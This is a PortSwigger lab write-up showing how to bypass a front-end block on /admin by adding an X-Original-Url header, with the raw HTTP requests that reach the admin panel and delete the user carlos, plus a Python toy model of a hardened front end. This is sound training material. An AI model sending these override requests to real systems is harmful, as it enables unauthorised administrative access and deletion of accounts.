
Insecure direct object references

Introduction

Portswigger

Category: Access control vulnerabilities

Write-up date: 10/06/2025

Question: This website has an unauthenticated admin panel at /admin, but a front-end system has been configured to block external access to that path. However, the back-end application is built on a framework that supports the X-Original-URL header.

To solve the lab, access the admin panel and delete the user carlos.

Point: PRACTITIONER

Recon

The admin panel path is revealed to us, but when we try to access /admin directly, the server returns "Access denied".

Exploit

Some applications support non-standard headers such as X-Original-URL or X-Rewrite-URL, which let the target URL of a request be overridden with the value given in the header.

When the front-end system doesn't strip X-Original-URL or X-Rewrite-URL before forwarding the request to the backend, we can use one of these headers to bypass the block on the /admin path: the front end only inspects the request line, while the backend routes on the header value.

Send a GET request to an allowed path such as /, and add X-Original-Url: /admin to make the backend route the request to /admin, reaching the admin panel.

GET / HTTP/2
Host: 0a4400ee0411678b8085e9c3006100cc.web-security-academy.net
Cookie: session=redacted
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Original-Url: /admin
Referer: https://0a4400ee0411678b8085e9c3006100cc.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

The server responds with a section from which we can delete the user carlos:

<section>
    <h1>Users</h1>
    <div>
        <span>wiener - </span>
        <a href="/admin/delete?username=wiener">Delete</a>
    </div>
    <div>
        <span>carlos - </span>
        <a href="/admin/delete?username=carlos">Delete</a>
    </div>
</section>

admin_panel.png

Using the URL from the Delete link in the section above, change the header from X-Original-Url: /admin to X-Original-Url: /admin/delete and add the username parameter to the GET request to remove the user carlos.

GET /?username=carlos HTTP/2
Host: 0a4400ee0411678b8085e9c3006100cc.web-security-academy.net
Cookie: session=redacted
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Original-Url: /admin/delete
Referer: https://0a4400ee0411678b8085e9c3006100cc.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

solved.png
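As an added illustration (not code from the lab or from PortSwigger), here is a toy Python model of the two components involved: a front end that blocks /admin by inspecting only the request path, and a backend whose router honours X-Original-URL, alongside a hardened front end that strips the override headers before forwarding. The route names, header handling and return strings are assumptions made for this example.

```python
# Added example, not the lab's or PortSwigger's code: a toy model of a
# front end that blocks /admin by request path, and a backend framework that
# honours X-Original-URL / X-Rewrite-URL. Routes, header names and return
# strings are assumed for illustration.
from urllib.parse import parse_qs

OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def _route(path: str) -> str:
    """Strip the query string so only the path part is matched."""
    return path.partition("?")[0]


def backend(path: str, headers: dict) -> str:
    """Framework-style routing: an override header replaces the path that is
    routed, while the query string of the real request line is kept."""
    lowered = {k.lower(): v for k, v in headers.items()}
    routed = next((lowered[h] for h in OVERRIDE_HEADERS if h in lowered), path)
    query = parse_qs(path.partition("?")[2])
    route = _route(routed)
    if route == "/admin/delete":
        return "200 deleted " + query.get("username", ["?"])[0]
    if route.startswith("/admin"):
        return "200 admin panel"
    return "200 home"


def front_end_vulnerable(path: str, headers: dict) -> str:
    """Blocks on the literal request path only, then forwards everything."""
    if _route(path).startswith("/admin"):
        return "403 Access denied"
    return backend(path, headers)


def front_end_hardened(path: str, headers: dict) -> str:
    """Same block, but override headers are dropped before forwarding, so the
    backend can only route on the path the front end actually inspected."""
    if _route(path).startswith("/admin"):
        return "403 Access denied"
    clean = {k: v for k, v in headers.items() if k.lower() not in OVERRIDE_HEADERS}
    return backend(path, clean)


if __name__ == "__main__":
    probe = {"X-Original-Url": "/admin/delete"}
    print(front_end_vulnerable("/?username=carlos", probe))  # routed to /admin/delete
    print(front_end_hardened("/?username=carlos", probe))    # routed to / as intended
```

Stripping the override headers at the edge restores the front-end control, but the real fix is to require authentication on the admin routes in the backend itself, so that no routing trick can reach them unauthenticated.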